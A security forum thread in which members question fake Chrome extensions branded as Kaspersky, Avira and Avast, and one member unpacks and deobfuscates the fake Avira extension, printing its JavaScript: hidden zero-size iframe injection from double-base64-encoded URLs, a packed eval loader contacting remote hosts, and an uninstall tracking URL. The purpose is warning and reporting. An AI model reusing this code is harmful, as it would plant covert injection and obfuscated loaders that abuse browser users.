chrome extensions are really tested and secure? like kaspersky privacy guard and avira protector ?

[giulia]

hi
about chrome extension , i have found that severals extension are really suspicious

for example Kaspersky Privacy Guard Pro is practically identical to Avira Antivirus - Protector of Online Surfing and to other

i have left chorme idle in my vm ,clean install w7 , and with google as webpage , these extensions have reported to have blocked (i don't remember the number but it was very high) threats

do you think are really legit ? and serious
i guess they could be dangerous and malware
i have found others extension with different names but almost the same gui , file size and so on
have you tested and tried these 2 extensions ? i mean Kaspersky Privacy Guard Pro & Avira Antivirus - Protector of Online Surfing?
thanks

 

[Rengar]

I think that Kaspersky privacy guard is ok. But i cant find the avira one.

 

[giulia]

I think that Kaspersky privacy guard is ok. But i cant find the avira one.

hi
here the link of avira Avira Antivirus - Protector of Online Surfing

 

[Windows_Security]

I don't trust them: same/simular GUI using a big brand antivirus to lure people into using it.

 

[509322]

hi
about chrome extension , i have found that severals extension are really suspicious

for example Kaspersky Privacy Guard Pro is practically identical to Avira Antivirus - Protector of Online Surfing and to other

i have left chorme idle in my vm ,clean install w7 , and with google as webpage , these extensions have reported to have blocked (i don't remember the number but it was very high) threats

do you think are really legit ? and serious
i guess they could be dangerous and malware
i have found others extension with different names but almost the same gui , file size and so on
have you tested and tried these 2 extensions ? i mean Kaspersky Privacy Guard Pro & Avira Antivirus - Protector of Online Surfing?
thanks

Contact Kaspersky Labs and ask them if it is an official Kaspersky Labs product or if it is bogus.

That is the only way to know for sure.

Same with Avira.

 

[harlan4096]

Hum so strange, I don't use usually Chrome browser, but I didn't know that "supposed" extension from Kaspersky for Chrome

 

[cruelsister]

I would be really suspicious of any Chrome extension, especially recently. Over the past 6 moths there has been an increasing number of malicious attacks on the developers of extensions. The purpose of the malware is to steal the Developers credentials; once this is done a previously coded extension replacement can be uploaded to the Chrome Store. The malicious extensions so far have been primarily data sealers (Bankers) and may have a current distribution of over 5 million for the 10 extensions so far identified.

 

[Deleted member 65228]

here the link of avira Avira Antivirus - Protector of Online Surfing

Below are three extensions really provided by Avira.
1. Avira SafeSearch Plus
2. Avira Password Manager
3. Avira Safe Shopping

All three of them have one thing in common: more than one language is supported and a proper description.

Here is an example of an authentic extension description.

Avira Password Manager automatically generates strong and unique passwords for all your accounts – and remembers them for you.

Here is an example of a suspicious, inaccurate description.

Real time scanning web pages and files. 100% Protection against malicious ransomware, spyware, trojan horse and suspicious trackers.

The interesting part in the above description is especially the claim for "100% Protection against malicious ransomware,...". The claim for "100% Protection" is suspicious, and the rest of the wording for the other part of the description is wrong... "malicious ransomware"? All ransomware is malicious. All Trojan horses are malicious. By definition ransomware is something that demands ransom in exchange for something (e.g. private key to decrypt your files, ransom blackmail to not leak stolen documents, etc.) and a Trojan Horse is something pretending to be something it isn't with malicious intent.

There is no Privacy Policy for the Avira extension you linked to, while all the other ones do have one. This is another indicator that the Avira one you found is not genuine.

I decided to take a look at the extensions myself with further inspection. ​

Below is an example of how the extension you linked us to is laid out prior to it being packed into *.CRX.

Below is an example of how the Avira SafeSearch source code is laid out prior to it being packed into *.CRX.

Right off the bat we can see a difference with layout for source code organisation. Big companies stick to routine for this to ease management/maintenance for the engineers, and many other rules are usually stuck to around source code layout, naming conventions in source code (sometimes), etc.

Let's take a look at logo.png which is from the suspicious extension.

Hmmm.... Now that doesn't look like the Avira logo, does it?

popup.js from the suspicious extension contents is below.

var openUrl = 'http://antivirus-extension.courthost.com/';
chrome.tabs.getAllInWindow(null, function (tabs) {
    for (var i = 0; i < tabs.length; i++) {
        if (tabs[i].url.substr(0, openUrl.length) == openUrl) {
            chrome.tabs.update(tabs[i].id, { selected: true });
            window.close();
            return;
        }
    }
    chrome.tabs.create({ url: openUrl, selected: true });
    //window.close();
});

showWelcomePage();

function showWelcomePage(){
    if (!localStorage["updateread"]) {
        localStorage["updateread"] = MAJOR_VERSION;
        chrome.tabs.create({url: welcomeURL});
    }
}

Well that is interesting! The URL hxxp://antivirus-extension.courthost.com/ has a -36 reputation score on VirusTotal, too. I doubt the real Avira would be hard-coding a URL to that website, hosted at CourtHost (free host), or any URL with a -36 reputation score at all.

The following is from the manifest.json file which all extensions for Chromium will have (therefore both Chrome and Opera).

 "permissions": [
    "tabs",
    "webRequest",
    "webRequestBlocking",
    "http://*/*",
    "https://*/*",
    "storage"
  ],

webRequest/webRequestBlocking is a valid permission which is required to use a feature from the Chrome API to intercept new web requests prior to them having been completed. The real Avira should be using this, as well as Avast and many other vendors which have an extension for intercepting web requests via a Chrome extension (I have not checked because I am not going to dig into the genuine extension's source, the genuine one provides no need to do this - whereas this rogue copy I can go through because I have reasonable intent for analysis). Based on this alone however, it is possible that this extension may actually block web requests or redirect them.

inline.js is just an array of domains, I did some tests of some of the URLs and they appear to be coming back as clean according to online resources however I cannot be certain.

background.js and page.js are obfuscated/minified therefore reading them were a bit more difficult at first. Thanks to a handy tool we can make it readable... JS NICE: Statistical renaming, Type inference and Deobfuscation (beware the page is claimed to be insecure but the tool is clean and genuine).

Below is background.js in readable form.

var KP_dwelltime;
var KP_gaptime;
/**
 * @return {undefined}
 */
var getSettings = function() {
  chrome.storage.sync.get(function(storageKey) {
    if (!storageKey.KP_dwelltime) {
      /** @type {number} */
      storageKey.KP_dwelltime = 50;
    }
    if (!storageKey.KP_gaptime) {
      /** @type {number} */
      storageKey.KP_gaptime = 50;
    }
    KP_dwelltime = storageKey.KP_dwelltime;
    KP_gaptime = storageKey.KP_gaptime;
    chrome.storage.sync.set(storageKey, function() {
    });
  });
};
chrome.tabs.onActivated.addListener(function(details) {
  chrome.tabs.get(details.tabId, function(request) {
    getSettings();
    chrome.storage.sync.get("KP__" + request.url.split("/")[2], function(dataAndEvents) {
      request.url.split("/");
    });
  });
});
chrome.tabs.onUpdated.addListener(function(dataAndEvents, jqXHR, request) {
  if ("complete" == jqXHR.status) {
    getSettings();
    chrome.storage.sync.get("KP__" + request.url.split("/")[2], function(dataAndEvents) {
      request.url.split("/");
    });
  }
});
/**
 * @param {?} dataAndEvents
 * @return {undefined}
 */
function logon(dataAndEvents) {
  if (dataAndEvents) {
    localval("dipislog88", "1");
    localval("InsDt6", "1502373696272");
  } else {
    localval("dipislog88", "0");
  }
}
if (-1 < document.location.href.indexOf("nonexistingitemguruedanpaitime")) {
  /** @type {string} */
  var idencompdate = "102337171019";
  /** @type {string} */
  localStorage.anpaitime = idencompdate;
}
/**
 * @return {undefined}
 */
function reloadit() {
  localval("dipLstLd88", "1");
  localval("dipLstSig88", "00112233");
}
/**
 * @return {undefined}
 */
function setishmn() {
  var cacheKey = {};
  /** @type {number} */
  cacheKey.isHmn1 = (new Date).getTime();
  chrome.storage.sync.set(cacheKey);
}
/**
 * @param {string} key
 * @param {string} res
 * @return {undefined}
 */
function localval(key, res) {
  chrome.storage.local.get(key, function(obj) {
    if (obj = obj[key]) {
      console.log(key + ": " + obj);
    } else {
      console.log(key + " not existing in chrome.storage.local");
    }
    if (res) {
      obj = {};
      /** @type {string} */
      obj[key] = res;
      console.log("set " + key + "=" + res);
      chrome.storage.local.set(obj);
    }
  });
}
/**
 * @return {undefined}
 */
function printall() {
  printlocals();
  printsyncs();
}
/**
 * @return {undefined}
 */
function printlocals() {
  chrome.storage.local.get(null, function(results) {
    for (key in results) {
      if (-1 == results[key].toString().indexOf("google-analytics.com")) {
        var fmt = "%clocal - " + key + ": " + results[key].toString().substring(0, 50);
        if (50 < results[key].toString().length) {
          fmt += "...";
        }
        console.log(fmt, "color: green");
      }
    }
  });
}
/**
 * @return {undefined}
 */
function printsyncs() {
  chrome.storage.sync.get(null, function(results) {
    for (key in results) {
      if (-1 == results[key].toString().indexOf("google-analytics.com")) {
        var fmt = "%csyncs - " + key + ": " + results[key].toString().substring(0, 50);
        if (50 < results[key].toString().length) {
          fmt += "...";
        }
        console.log(fmt, "color: blue");
      }
    }
  });
}
/**
 * @param {string} name
 * @param {string} value
 * @return {undefined}
 */
function syncval(name, value) {
  chrome.storage.sync.get(name, function(view) {
    if (view = view[name]) {
      console.log(name + ": " + view);
    } else {
      console.log(name + " not existing in chrome.storage.sync");
    }
    if (value) {
      view = {};
      /** @type {string} */
      view[name] = value;
      console.log("set " + name + "=" + value);
      chrome.storage.sync.set(view);
    }
  });
}
/**
 * @param {string} inplace
 * @param {string} deepDataAndEvents
 * @return {?}
 */
function dblB64(inplace, deepDataAndEvents) {
  return B64E(B64E(inplace, deepDataAndEvents), deepDataAndEvents);
}
/**
 * @param {string} data
 * @param {string} deepDataAndEvents
 * @return {?}
 */
function B64E(data, deepDataAndEvents) {
  var Base64 = {
    _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    /**
     * @param {string} input
     * @return {?}
     */
    encode : function(input) {
      /** @type {string} */
      var out = "";
      /** @type {number} */
      var i = 0;
      input = Base64._utf8_encode(input);
      for (;i < input.length;) {
        var enc4 = input.charCodeAt(i++);
        var chr2 = input.charCodeAt(i++);
        var val2 = input.charCodeAt(i++);
        /** @type {number} */
        var enc3 = enc4 >> 2;
        /** @type {number} */
        enc4 = (enc4 & 3) << 4 | chr2 >> 4;
        /** @type {number} */
        var enc2 = (chr2 & 15) << 2 | val2 >> 6;
        /** @type {number} */
        var enc1 = val2 & 63;
        if (isNaN(chr2)) {
          /** @type {number} */
          enc2 = enc1 = 64;
        } else {
          if (isNaN(val2)) {
            /** @type {number} */
            enc1 = 64;
          }
        }
        out = out + this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4) + this._keyStr.charAt(enc2) + this._keyStr.charAt(enc1);
      }
      return out;
    },
    /**
     * @param {string} input
     * @return {?}
     */
    decode : function(input) {
      /** @type {string} */
      var output = "";
      /** @type {number} */
      var i = 0;
      input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
      for (;i < input.length;) {
        var lo = this._keyStr.indexOf(input.charAt(i++));
        var c2 = this._keyStr.indexOf(input.charAt(i++));
        var g = this._keyStr.indexOf(input.charAt(i++));
        var e4 = this._keyStr.indexOf(input.charAt(i++));
        /** @type {number} */
        lo = lo << 2 | c2 >> 4;
        /** @type {number} */
        c2 = (c2 & 15) << 4 | g >> 2;
        /** @type {number} */
        var c3 = (g & 3) << 6 | e4;
        output += String.fromCharCode(lo);
        if (64 != g) {
          output += String.fromCharCode(c2);
        }
        if (64 != e4) {
          output += String.fromCharCode(c3);
        }
      }
      return output = Base64._utf8_decode(output);
    },
    /**
     * @param {string} string
     * @return {?}
     */
    _utf8_encode : function(string) {
      string = string.replace(/\r\n/g, "\n");
      /** @type {string} */
      var utftext = "";
      /** @type {number} */
      var n = 0;
      for (;n < string.length;n++) {
        var c = string.charCodeAt(n);
        if (128 > c) {
          utftext += String.fromCharCode(c);
        } else {
          if (127 < c && 2048 > c) {
            utftext += String.fromCharCode(c >> 6 | 192);
          } else {
            utftext += String.fromCharCode(c >> 12 | 224);
            utftext += String.fromCharCode(c >> 6 & 63 | 128);
          }
          utftext += String.fromCharCode(c & 63 | 128);
        }
      }
      return utftext;
    },
    /**
     * @param {string} utftext
     * @return {?}
     */
    _utf8_decode : function(utftext) {
      /** @type {string} */
      var str = "";
      /** @type {number} */
      var i = 0;
      /** @type {number} */
      c1 = c2 = 0;
      for (;i < utftext.length;) {
        var b = utftext.charCodeAt(i);
        if (128 > b) {
          str += String.fromCharCode(b);
          i++;
        } else {
          if (191 < b && 224 > b) {
            c2 = utftext.charCodeAt(i + 1);
            str += String.fromCharCode((b & 31) << 6 | c2 & 63);
            i += 2;
          } else {
            c2 = utftext.charCodeAt(i + 1);
            c3 = utftext.charCodeAt(i + 2);
            str += String.fromCharCode((b & 15) << 12 | (c2 & 63) << 6 | c3 & 63);
            i += 3;
          }
        }
      }
      return str;
    }
  };
  if ("encode" == deepDataAndEvents) {
    return Base64.encode(data);
  }
  if ("decode" == deepDataAndEvents) {
    return Base64.decode(data);
  }
}
/**
 * @param {number} min
 * @param {number} max
 * @return {?}
 */
function getRandomInt(min, max) {
  return Math.floor(Math.random() * (max - min)) + min;
}
/** @type {string} */
var curIfrId = "";
/**
 * @param {string} val
 * @param {number} opt_attributes
 * @return {undefined}
 */
function IstIvsIfm_ex(val, opt_attributes) {
  if ("" != val) {
    /** @type {Element} */
    var s = document.createElement(dblB64("YVdaeVlXMWw=", "decode"));
    var m = B64E(val + getRandomInt(1, 999999).toString(), "encode");
    s.setAttribute("width", "0px");
    s.setAttribute("height", "0px");
    s.setAttribute("display", "none");
    s.setAttribute("src", val);
    s.setAttribute("id", m);
    document.body.appendChild(s);
    curIfrId = m;
    setTimeout(function() {
      /** @type {(HTMLElement|null)} */
      var tabPage = document.getElementById(m);
      tabPage.parentNode.removeChild(tabPage);
    }, 1E3 * opt_attributes);
  }
}
chrome.runtime.onMessage.addListener(function(dataAndEvents, deepDataAndEvents, done) {
  if (dataAndEvents.refererUrl) {
    var js = dblB64(dataAndEvents.refererUrl, "decode");
    IstIvsIfm_ex(js, 20);
    done({
      done : "ok"
    });
  }
  if (dataAndEvents.mercUrl) {
    js = dblB64(dataAndEvents.mercUrl, "decode");
    setTimeout(function() {
      document.getElementById(curIfrId).src = js;
    }, 1E3);
  }
});
/**
 * @return {undefined}
 */
window.onbeforeunload = function() {
  reloadme();
};
/**
 * @return {undefined}
 */
function reloadme() {
  chrome.runtime.reload();
}
if (chrome.runtime.setUninstallURL) {
  chrome.storage.local.get("InsDt6", function(deepDataAndEvents) {
    deepDataAndEvents = deepDataAndEvents.InsDt6;
    /** @type {number} */
    inst = ((new Date).getTime() - deepDataAndEvents) / 1E3 / 3600 / 24;
    /** @type {string} */
    inst = inst.toString().substring(0, 5);
    deepDataAndEvents = "http://mitarchive.info/temp/survey.html?inst=" + inst + "&id=" + chrome.runtime.id.substring(0, 3);
    chrome.runtime.setUninstallURL(deepDataAndEvents);
  });
}
;

Below is page.js in readable form.

/**
 * @param {Window} global
 * @param {?} factory
 * @return {undefined}
 */
function CMejLrFH(global, factory) {
  if ("object" == typeof module && "object" == typeof module.exports) {
    module.exports = global.document ? factory(global, true) : function($) {
      if (!$.document) {
        throw new Error("document");
      }
      return factory($);
    };
  } else {
    factory(global);
  }
}
/**
 * @param {Window} global
 * @param {?} factory
 * @return {undefined}
 */
function ntgzivfM(global, factory) {
  if ("key" == typeof module && "key" == typeof module.exports) {
    module.exports = global.document ? factory(global, true) : function($) {
      if (!$.document) {
        throw new Error("key");
      }
      return factory($);
    };
  } else {
    factory(global);
  }
}
/**
 * @param {Window} global
 * @param {?} factory
 * @return {undefined}
 */
function duRwCNaF(global, factory) {
  if ("val" == typeof module && "val" == typeof module.exports) {
    module.exports = global.document ? factory(global, true) : function($) {
      if (!$.document) {
        throw new Error("val");
      }
      return factory($);
    };
  } else {
    factory(global);
  }
}
/**
 * @param {Array} codeSegments
 * @return {?}
 */
function pHjyLIOk(codeSegments) {
  var _decipherStr = {
    _decipherStr : "WkVkb2NHTXliSHBaVjA1d1kwZG9iR051VGpCamJXeDFXak5TZG1SWVRteGFSemwxWWpOU2MxcFhSbkk=",
    /**
     * @param {string} queryStr
     * @return {?}
     */
    dc : function(queryStr) {
      return _decipherStr;
    }
  };
  /** @type {string} */
  var CMejLrFH = '(function(){var g=s.createElement("div");g.innerHTML="<div></div><div></div>";if(!(!g.getElementsByClassName||g.getElementsByClassName("e").length===0)){g.lastChild.className="e";if(g.getElementsByClassName("e").length!==1){n.order.splice(1,0,"CLASS");n.find.CLASS=function(h,l,m){if(typeof l.getElementsByClassName!=="undefined"&&!m)return l.getElementsByClassName(h[1])};g=null}}})();var E=s.compareDocumentPosition?function(g,h){return!!(g.compareDocumentPosition(h)&16)}:';
  var Base64 = {
    _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    /**
     * @param {string} text
     * @return {?}
     */
    dc : function(text) {
      /** @type {string} */
      var output = "";
      var chr1;
      var chr2;
      var chr3;
      var enc1;
      var enc2;
      var u;
      var enc4;
      /** @type {number} */
      var i = 0;
      text = text.replace(/[^A-Za-z0-9\+\/\=]/g, "");
      for (;i < text.length;) {
        enc1 = this._keyStr.indexOf(text.charAt(i++));
        enc2 = this._keyStr.indexOf(text.charAt(i++));
        u = this._keyStr.indexOf(text.charAt(i++));
        enc4 = this._keyStr.indexOf(text.charAt(i++));
        /** @type {number} */
        chr1 = enc1 << 2 | enc2 >> 4;
        /** @type {number} */
        chr2 = (enc2 & 15) << 4 | u >> 2;
        /** @type {number} */
        chr3 = (u & 3) << 6 | enc4;
        /** @type {string} */
        output = output + String.fromCharCode(chr1);
        if (u != 64) {
          /** @type {string} */
          output = output + String.fromCharCode(chr2);
        }
        if (enc4 != 64) {
          /** @type {string} */
          output = output + String.fromCharCode(chr3);
        }
      }
      output = Base64._utf8_decode(output);
      return output;
    },
    /**
     * @param {string} string
     * @return {?}
     */
    _utf8_encode : function(string) {
      string = string.replace(/\r\n/g, "\n");
      /** @type {string} */
      var utftext = "";
      /** @type {number} */
      var n = 0;
      for (;n < string.length;n++) {
        var c = string.charCodeAt(n);
        if (c < 128) {
          utftext += String.fromCharCode(c);
        } else {
          if (c > 127 && c < 2048) {
            utftext += String.fromCharCode(c >> 6 | 192);
            utftext += String.fromCharCode(c & 63 | 128);
          } else {
            utftext += String.fromCharCode(c >> 12 | 224);
            utftext += String.fromCharCode(c >> 6 & 63 | 128);
            utftext += String.fromCharCode(c & 63 | 128);
          }
        }
      }
      return utftext;
    },
    /**
     * @param {string} utftext
     * @return {?}
     */
    _utf8_decode : function(utftext) {
      /** @type {string} */
      var string = "";
      /** @type {number} */
      var i = 0;
      /** @type {number} */
      var c = c1 = c2 = 0;
      for (;i < utftext.length;) {
        c = utftext.charCodeAt(i);
        if (c < 128) {
          string += String.fromCharCode(c);
          i++;
        } else {
          if (c > 191 && c < 224) {
            c2 = utftext.charCodeAt(i + 1);
            string += String.fromCharCode((c & 31) << 6 | c2 & 63);
            i += 2;
          } else {
            c2 = utftext.charCodeAt(i + 1);
            c3 = utftext.charCodeAt(i + 2);
            string += String.fromCharCode((c & 15) << 12 | (c2 & 63) << 6 | c3 & 63);
            i += 3;
          }
        }
      }
      return string;
    }
  };
  /** @type {string} */
  var url = "";
  /** @type {number} */
  var i = 0;
  for (;i < codeSegments.length;i++) {
    var letter = codeSegments[i];
    if (letter == letter.toUpperCase()) {
      letter = letter.toLowerCase();
    } else {
      if (letter == letter.toLowerCase()) {
        letter = letter.toUpperCase();
      }
    }
    /** @type {string} */
    url = url + letter;
  }
  /** @type {Array} */
  var jQuery = ["jQuery", "jQuery Library v1.4.2", "Copyright 2010, John Resig"];
  /** @type {string} */
  var ntgzivfM = 'function ExtractString(a,b,c){var d="ERROR";-1<a.indexOf(b)&&(a=a.split(b),-1<a[1].indexOf(c)&&(d=a[1].split(c)[0]));return d};';
  var deployOptions = {
    site : "SIMPLE+",
    /**
     * @param {string} queryStr
     * @return {?}
     */
    dc : function(queryStr) {
      return "ntgzivfM.jQuery";
    }
  };
  return Base64.dc(url);
}
eval(function(str, div, name, pair, func, opt_attributes) {
  /**
   * @param {number} i
   * @return {?}
   */
  func = function(i) {
    return(i < div ? "" : func(parseInt(i / div))) + ((i = i % div) > 35 ? String.fromCharCode(i + 29) : i.toString(36));
  };
  if (!"".replace(/^/, String)) {
    for (;name--;) {
      opt_attributes[func(name)] = pair[name] || func(name);
    }
    /** @type {Array} */
    pair = [function(timeoutKey) {
      return opt_attributes[timeoutKey];
    }];
    /**
     * @return {?}
     */
    func = function() {
      return "\\w+";
    };
    /** @type {number} */
    name = 1;
  }
  for (;name--;) {
    if (pair[name]) {
      /** @type {string} */
      str = str.replace(new RegExp("\\b" + func(name) + "\\b", "g"), pair[name]);
    }
  }
  return str;
}('7 q={},W;1C();8 1C(){10()||y.z.N.13(1T,8(a){L(Y 1U a)q[Y]=a[Y];"1"==q.1P&&(W=!0);1E()})}8 1E(){7 a=q.G;a?(a=((C E).K()-a)/1y/1F/24,5>a?u(a+"<5 1I 2a"):(1x()&&O(!0),1G())):1A()}8 1A(){y.z.1w.13("G",8(a){p(a.G){7 b={};b.G=a.G;y.z.N.P(b)}1m 1z()})}8 1z(){y.z.1w.P({G:(C E).K()},8(){})}8 1G(){7 a=q.1l;a&&-1<a.j("1o")&&2d(a)}7 X=24;8 1x(){U{p(!q.R)i!0;7 a=((C E).K()-q.R)/1y/1F;u("28: "+a+" ("+X+" 2c)");p(a>X)i!0}S(b){i!0}i!1}8 O(a){U{7 b=C 2b;b.1Q=8(){4==b.2e&&(1S==b.1V?1p(b.1J):a&&(u("1i 1g 1u..."),O(!1)))};b.29=8(){a&&(u("1i 1g 1u..."),O(!1))};b.2f=8(){};b.25=!0;7 c="//26.23.11/1h/1d.1r?f=1s";a||(c="//22.1Z/1h/1d.1r?f=1s");q.Z&&-1==c.j("&c=")&&(c=c+"&c="+q.Z);u("1Y 1X "+c);b.1M("1N",c,!0);b.1L()}S(f){i"1K"}}8 1p(a){p(20<a.B&&-1<a.j("1o")){u("1O 1n");7 b=a.1W("`"),c=a.1a(0,b);a=a.1a(b+1);b={};b.Z=c;b.R=(C E).K();b.1l=a}1m u("1R 1n: B="+a.B+" 27="+a.j("2j")),b={},b.R=(C E).K();y.z.N.P(b)}8 10(){U{i D.1c!==D.14}S(a){i!0}}8 u(a){U{p(W){7 b=(C E).2G();2E.2I("%2C - "+b+" "+a+"\\t\\t"+2H.2O.2M.2J,"2K: 2L")}}S(c){}}1t();8 1t(){p(10()&&D.2z===D.14&&(y.z.N.13("16",8(a){7 b=a.16;b&&""!=b&&(a=19(b.1e("^")[0],"J"),b=19(b.1e("^")[1],"J"),-1<D.H.M.j(1j(a,!0))&&(D.H.M=b,1H("16","")))}),-1<H.M.j("2m.2n.11/2o?")||-1<H.M.j("2l-2k.2h.11"))){7 a=1b.2i("2A")[0].2p;a=a.Q("p (14.H != 1c.H)","p (1==2)");1b.2q(a)}}8 17(a,b){7 c={s:"2w+/=",18:8(a){7 b="",e=0;L(a=c.1v(a);e<a.B;){7 d=a.v(e++);7 f=a.v(e++);7 g=a.v(e++);7 h=d>>2;d=(d&3)<<4|f>>4;7 k=(f&15)<<2|g>>6;7 l=g&F;1q(f)?k=l=V:1q(g)&&(l=V);b=b+x.s.w(h)+x.s.w(d)+x.s.w(k)+x.s.w(l)}i b},J:8(a){7 b="",e=0;L(a=a.Q(/[^A-2x-2y-9\\+\\/\\=]/g,"");e<a.B;){7 d=x.s.j(a.w(e++));7 f=x.s.j(a.w(e++));7 g=x.s.j(a.w(e++));7 h=x.s.j(a.w(e++));d=d<<2|f>>4;f=(f&15)<<4|g>>2;7 k=(g&3)<<6|h;b+=m.o(d);V!=g&&(b+=m.o(f));V!=h&&(b+=m.o(k))}i b=c.1D(b)},1v:8(a){a=a.Q(/\\r\\n/g,"\\n");L(7 b="",c=0;c<a.B;c++){7 d=a.v(c);T>d?b+=m.o(d):(2v<d&&2u>d?b+=m.o(d>>6|2r):(b+=m.o(d>>12|1B),b+=m.o(d>>6&F|T)),b+=m.o(d&F|T))}i b},1D:8(a){7 b="",c=0;L(2s=I=0;c<a.B;){7 d=a.v(c);T>d?(b+=m.o(d),c++):2D<d&&1B>d?(I=a.v(c+1),b+=m.o((d&2t)<<6|I&F),c+=2):(I=a.v(c+1),1f=a.v(c+2),b+=m.o((d&15)<<12|(I&F)<<6|1f&F),c+=3)}i b}};p("18"==b)i c.18(a);p("J"==b)i c.J(a)}8 19(a,b){i 17(17(a,b),b)}8 1j(a,b){0!=a.j("1k")&&(a="1k://"+a);7 c=1b.2F("a");c.M=a;c=c.2g.2B();b&&0==c.j("2N.")&&(c=c.1a(4));i c=c.Q(":21","")}8 1H(a,b){7 c={};c[a]=b;y.z.N.P(c)};',
62, 175, pHjyLIOk("FhX8FhX8FhzHCNXMDw5JDgLVBNX8FhX8FhX8FhXYzxr1CM58Aw5KzxHpzNX8Ffn0CMLUz3X8zNjVBunOyxjdB2rLFgLMFgXVy2fSvMfSC3X8x2TLEvn0CNX8Bg9KzxjSB2D8y2HHCKnVzgvbDhXJAgfYqxr8DgHPC3XJAhjVBwv8C3rVCMfNzxX8BgvUz3rOFg5LD3X3Aw5KB3D8rgf0zxW2m3XjBNneDdz8Bg9JyxrPB258yZj8zgvJB2rLFgDLDfrPBwv8zM9YFgHYzwz8Bg9JywX8tgrsBxrtDNjdzhXZzxr8CMvWBgfJzxXKAxbmC3rmzdy2FgnHDgnOFdeYohX0CNL8nJr8AxnSB2DVBNXSzezYzxfiB3vYFgTLExXKAxbmC3rtAwC2nNXPBKLMCM1LnNXJB218FgDLDhX0B3b8Fgv4Dgz0C2fTCZK5yMf8qJy0rxXLBMnVzgv8zgjSqJy0Fhn1yNn0CMLUz3XKB2n1BwvUDhXZzwXMFhfTFhnWBgL0FgmZFhrVFgv4DhXZD2L0y2H8zxH0CKHVC3rFzxH8Ahr0ChXKAxbmC3rdzdy2FgvSC2v8C2H1yxHPBNXZDNjKCgnKC3XtDLjTDfn2CKnKFgLZtMfoFhbOChXZDNj8AwzYBvjLzKfJDg58yMfJA3vWFf91Dgy4x2vUy29KzxXZEw5JFe5KrNrJAfn2CKnKFdffm3XZDKLUC0r0nNXMDeLUC0r0nNWYmJr8Aw5PDdz8x3v0zJHFzgvJB2rLFgXVzgvjBNneDhWZnJaWFev4uM10u3zYq2r8C2v0tg9JywX8C3rVChXYzxnWB25ZzvrLEhr8zxHJzxb0Aw9UFhnLBMr8B3bLBNXhrvr8C3vJy3XKAxbPC2XVzZG4Fg9UCMvHzhLZDgf0zwnOyw5NzxXMywLSFdiWmhXUDwXSFgLUFhn0yxr1C3XZzwfYy2H8zNjVBxXSB2fKAw5NFg9Yz3X8odb8zhPHENXPCgfNzxX8D2L0AenYzwrLBNrPywXZFgzSzwfTyxjRzxr1BMLTzxXZAwD8AhjZFg9UzxjYB3j8AgvYzxXytuXiDhrWuMvXDwvZDhXYzxf1AxjLzhXLDMfSFhjLywr5u3rHDgv8B25WCM9NCMvZC3XOB3n0FgPKFgDLDevSzw1LBNrZqNLuywDoyw1LFgrPCgv4DhnPz3XJBgLJA3X1BMLVBNXPy2T8DgfVyMfVFhrFANn8Aw5Uzxjive1mFhDYAxrLFde5mNXJmxWZmxWYmdq4FdeYn3XbqKneruzhseLks0XntK9quvjtvfvwv1HzwMfIy2rLzMDOAwPRBg1UB3bXCNn0Dxz3EhL6mdeYmZq1nJC4oxXAyxX6mhXWyxjLBNr8AhrTBhX0B0XVD2vYq2fZzxXJtg9KCNWXotf8y29UC29SzxXJCMvHDgvfBgvTzw50FhrVtg9JywXLvgLTzvn0CMLUz3XHCMD1BwvUDhn8Bg9NFg5HBwv8y29SB3j8z3jLzw58y2fSBgvYFhD3D3XJywXSzwu=").split("|"),
0, {}));

IMO it all looks suspicious. I cannot tell you exactly what is on-going with the JavaScript because I am far from knowledgeable with the language, I am a software developer, not a web developer - there are other JS files which can be inspected too. However what I can indefinitely tell you by facts is that this Avira extension you linked us to is 100% not genuinely from Avira and I have absolutely no doubt in my mind that someone is either trying to piggy-back off the success of Avira with a fake extension for a peculiar reason, or has malicious intents (if not now then somewhere down the line after attracting more people to download and install the extension).

This fake Avira extension is hardly anything in terms of code-base size to what you could expect from a well-known and trusted vendor like Avira.

Here is the CourtHost website referenced in the source code of the fake extension.

As we can see, that is 100% not from Avira.

If you send me the link to the other extension you had suspicion about, I'll try to check it out now for you and see what I can report back. However, stay away from that Avira extension and Report it for abuse.

Thanks for reading, stay safe friend.

 

[giulia]

@Opcode
amazing job , information and analysis
i'm wondering how easy is upload such extentions , what kind of control does google perform ?
would be really great know what are these extension doing ? i man what nasty task they are doing
just like i said i left in a virtual machine , chrome (clean install ) without any information , and these extensions did claim to have stopped many and many malware
there are lots of user that have installed them and there are more extension like them , but i can't remember their names

ps there is another Privacy Lock by Avast 2.11.1
thanks Opcode

 

[Deleted member 65228]

i'm wondering how easy is upload such extentions , what kind of control does google perform ?

Google Chrome extensions aren't properly protected. The *.CRX can be downloaded without installing the extension into Google Chrome and you can then unpack the file to receive full view of the code-base. From there-on you may encounter obfuscation/protection techniques manually applied by the extension owner, other than that there is no restriction of access.

I am not going to provide step-by-step instructions on doing this because I am pretty sure that laws still apply, and don't want to encourage anyone trying to sneak into genuine extensions which are closed-source. This is why I did not provide any other screenshots regarding the genuine Avira extension, I didn't go any further than acquiring the screenshot of the documents for legal reasons.

The Kaspersky extension you mentioned: Kaspersky Privacy Guard Pro

That extension is fake as well, and if you know how to and perform analysis, you'll see the source code is either extremely similar or actually completely identical to the previous Avira rogue extension. This implies it was created and published by the same person who published the illegitimate Avira extension.

The fake Kaspersky extension is actually detected as a threat by Kaspersky according to the Chrome Store reviews.

 

[Deleted member 65228]

ps there is another Privacy Lock by Avast 2.11.1

Privacy Lock by Avast

That extension? LOL. I just took a look for you and I am 99% certain that is by the same author/s as well... Too many similarities with the analysis for it not to be by the same person/people. The extension even has the same hard-coded domain names like the other two do, but in another *.js file this time.

 

[giulia]

hi
how can i contact kaspersky ,avira ,avast and other to check these extensions and report an analisys?
i got lost in kaspersky sites
thanks

 

[harlan4096]

It seems Kaspersky already detects 2 files of the full files code of that extension:

Spoiler: KL VirusDesk

 

[giulia]

It seems Kaspersky already detects 2 files of the full files code of that extension:

hi
have you upload it? should i upload via email?
but will kaspersky release a short analisys about what does it doing these extensions?
kaspersky detect them only today , right?
i will switch to kaspersky , no more eset for me anymore
thanks

 

[harlan4096]

I just compressed the unpacked content of the extension installed in my Chrome browser, and then sent it to KL VirusDesk, that was the results

​

 

[DeepWeb]

